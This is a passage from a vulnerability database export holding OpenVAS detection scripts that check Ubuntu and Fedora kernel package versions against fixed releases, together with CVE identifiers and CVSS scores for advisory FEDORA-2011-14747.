rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-pcmcia-modules-2.6.28-19-generic-di\", ver:\"2.6.28-19.66\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-shared-modules-2.6.28-19-generic-di\", ver:\"2.6.28-19.66\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-usb-modules-2.6.28-19-generic-di\", ver:\"2.6.28-19.66\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"parport-modules-2.6.28-19-generic-di\", ver:\"2.6.28-19.66\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pata-modules-2.6.28-19-generic-di\", ver:\"2.6.28-19.66\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pcmcia-modules-2.6.28-19-generic-di\", ver:\"2.6.28-19.66\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pcmcia-storage-modules-2.6.28-19-generic-di\", ver:\"2.6.28-19.66\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"plip-modules-2.6.28-19-generic-di\", ver:\"2.6.28-19.66\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ppp-modules-2.6.28-19-generic-di\", ver:\"2.6.28-19.66\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"sata-modules-2.6.28-19-generic-di\", ver:\"2.6.28-19.66\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"scsi-modules-2.6.28-19-generic-di\", ver:\"2.6.28-19.66\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"serial-modules-2.6.28-19-generic-di\", ver:\"2.6.28-19.66\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"storage-core-modules-2.6.28-19-generic-di\", ver:\"2.6.28-19.66\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"usb-modules-2.6.28-19-generic-di\", ver:\"2.6.28-19.66\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"virtio-modules-2.6.28-19-generic-di\", ver:\"2.6.28-19.66\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU8.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-28-386\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-28-generic\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-28-openvz\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-28-rt\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-28-server\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-28-virtual\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-28-xen\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-28-386\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-28-generic\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-28-server\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-28-virtual\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-debug-2.6.24-28-386\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-debug-2.6.24-28-generic\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-debug-2.6.24-28-server\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-debug-2.6.24-28-virtual\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-libc-dev\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-28-openvz\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-28-rt\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-28-xen\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-doc-2.6.24\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-28\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-kernel-devel\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-source-2.6.24\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"acpi-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"acpi-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"block-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"block-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"crypto-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"crypto-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fat-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fat-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fb-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fb-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"firewire-core-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"firewire-core-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"floppy-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"floppy-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fs-core-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fs-core-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fs-secondary-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fs-secondary-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ide-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ide-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"input-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"input-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ipv6-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ipv6-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"irda-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"irda-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kernel-image-2.6.24-28-386-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kernel-image-2.6.24-28-generic-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"md-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"md-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"message-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"message-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nfs-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nfs-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-pcmcia-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-pcmcia-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-shared-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-shared-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-usb-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-usb-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"parport-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"parport-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pata-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pata-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pcmcia-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pcmcia-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pcmcia-storage-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pcmcia-storage-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"plip-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"plip-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ppp-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ppp-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"sata-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"sata-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"scsi-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"scsi-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"serial-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"serial-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"socket-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"socket-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"storage-core-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"storage-core-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"usb-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"usb-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-08-01T16:18:25", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2011-10-31T00:00:00", "type": "openvas", "title": "Fedora Update for kernel FEDORA-2011-14747", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-3904", "CVE-2011-2918", "CVE-2010-4073", "CVE-2011-3188", "CVE-2010-4668", "CVE-2010-4072", "CVE-2011-1746", "CVE-2011-2723", "CVE-2011-1494", "CVE-2011-2517", "CVE-2011-2928", "CVE-2010-2963", "CVE-2011-2699", "CVE-2010-3698", "CVE-2011-1161", "CVE-2011-1770", "CVE-2011-1495", "CVE-2011-1833", "CVE-2010-3880", "CVE-2011-3353", "CVE-2011-2905", "CVE-2011-2497", "CVE-2011-2695", "CVE-2010-2962", "CVE-2011-3638", "CVE-2011-1745", "CVE-2011-3191"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310863604", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310863604", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for kernel FEDORA-2011-14747\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2011-October/068684.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.863604\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-10-31 13:45:00 +0100 (Mon, 31 Oct 2011)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"FEDORA\", value:\"2011-14747\");\n script_cve_id(\"CVE-2011-1161\", \"CVE-2011-3353\", \"CVE-2011-2918\", \"CVE-2011-3188\",\n \"CVE-2011-2723\", \"CVE-2011-2928\", \"CVE-2011-3191\", \"CVE-2011-1833\",\n \"CVE-2011-2905\", \"CVE-2011-2695\", \"CVE-2011-2497\", \"CVE-2011-2517\",\n \"CVE-2011-2699\", \"CVE-2011-1770\", \"CVE-2011-1494\", \"CVE-2011-1495\",\n \"CVE-2011-1745\", \"CVE-2011-1746\", \"CVE-2010-4668\", \"CVE-2010-4073\",\n \"CVE-2010-4072\", \"CVE-2010-3880\", \"CVE-2010-2962\", \"CVE-2010-3698\",\n \"CVE-2010-2963\", \"CVE-2010-3904\", \"CVE-2011-3638\");\n script_name(\"Fedora Update for kernel FEDORA-2011-14747\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC14\");\n script_tag(name:\"affected\", value:\"kernel on Fedora 14\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC14\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.35.14~100.fc14\", rls:\"FC14\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-25T10:55:50", "description": "Check for the Version of kernel", "cvss3": {}, "published": "2011-10-31T00:00:00", "type": "openvas", "title": "Fedora Update for kernel FEDORA-2011-14747", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-3904", "CVE-2011-2918", "CVE-2010-4073", "CVE-2011-3188", "CVE-2010-4668", "CVE-2010-4072", "CVE-2011-1746", "CVE-2011-2723", "CVE-2011-1494", "CVE-2011-2517", "CVE-2011-2928", "CVE-2010-2963", "CVE-2011-2699", "CVE-2010-3698", "CVE-2011-1161", "CVE-2011-1770", "CVE-2011-1495", "CVE-2011-1833", "CVE-2010-3880", "CVE-2011-3353", "CVE-2011-2905", "CVE-2011-2497", "CVE-2011-2695", "CVE-2010-2962", "CVE-2011-3638", "CVE-2011-1745", "CVE-2011-3191"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:863604", "href": "http://plugins.openvas.org/nasl.php?oid=863604", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for kernel FEDORA-2011-14747\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"kernel on Fedora 14\";\ntag_insight = \"The kernel package contains the Linux kernel (vmlinuz), the core of any\n Linux operating system. The kernel handles the basic functions\n of the operating system: memory allocation, process allocation, device\n input and output, etc.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2011-October/068684.html\");\n script_id(863604);\n script_version(\"$Revision: 6626 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:30:10 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-10-31 13:45:00 +0100 (Mon, 31 Oct 2011)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n 